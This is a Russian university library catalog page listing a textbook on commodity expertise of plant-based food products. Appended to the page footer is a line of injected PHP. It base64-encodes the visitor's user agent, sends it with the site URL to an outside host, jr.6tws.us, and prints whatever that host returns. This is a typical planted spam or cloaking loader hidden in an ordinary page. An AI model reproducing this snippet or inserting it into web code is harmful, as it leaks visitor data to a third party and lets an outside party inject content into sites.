Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

299 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Шифр документа=7D771888-AB1C-94BF-17EB-B1D3CC896E94$")И(("Ключевые слова=Пряность"))
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 1
1. 
7D771888-AB1C-94BF-17EB-B1D3CC896E94
(Нет сведений об экземплярах)
7D771888-AB1C-94BF-17EB-B1D3CC896E94
658.6/.8/И29
Идентификационная и товарная экспертиза продуктов растительного происхождения [Текст] / Л. Г. Елисеева [и др.] ; ред. Л. Г. Елисеева. - М. : ИНФРА-М, 2013. - 523 с. - (Высшее образование). - Библиогр.: с. 491-501. - ISBN 978-5-16-003821-6 : 394.35 р.
УДК 658.62(075)

Рубрики:
Продукты растительного происхождения -- Экспертиза -- Учебники и пособия

Кл.слова (ненормированные): УЧЕБНИК И ПОСОБИЕ * -- ЗЕРНО -- МУКА -- КРУПА -- ХЛЕБ -- МАКАРОНЫ -- ОВОЩИ -- КОФЕ -- ЧАЙ -- ПРЯНОСТЬ -- ПРИПРАВА -- САХАР -- ГМО
Аннотация: Рассматриваются теоретические основы идентификационной и товарной экспертизы продуктов растительного происхождения, в том числе зерномучных товаров, свежих плодов и овощей, вкусовых товаров, крахмала, сахара, меда и кондитерских товаров и др.
Особое внимание уделяется экспертизе генетически модифицированных пищевых продуктов растительного происхождения.
Для студентов, обучающихся по специальности «Товароведение», также специалистов торговли, работников таможенных и экспертных предприятий
Доп. точки доступа:
Елисеева, Л. Г.
Иванова, Т. Н.
Положишникова, М. А.
Рыжакова, А. В.
Елисеева, Л. Г.ред.

Нет сведений об экземплярах
Держатели документа:
Омский государственный технический университет : Россия, 644050, г. Омск, проспект Мира, 11
Держатели документа (Информация об экземплярах) 

Рассматриваются теоретические основы идентификационной и товарной экспертизы продуктов растительного происхождения, в том числе зерномучных товаров, свежих плодов и овощей, вкусовых товаров, крахмала, сахара, меда и кондитерских товаров и др.

Особое внимание уделяется экспертизе генетически модифицированных пищевых продуктов растительного происхождения.

Для студентов, обучающихся по специальности «Товароведение», также специалистов торговли, работников таможенных и экспертных предприятий



    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2808 - 16.02.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.11 с.14 запросов, 1.31c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;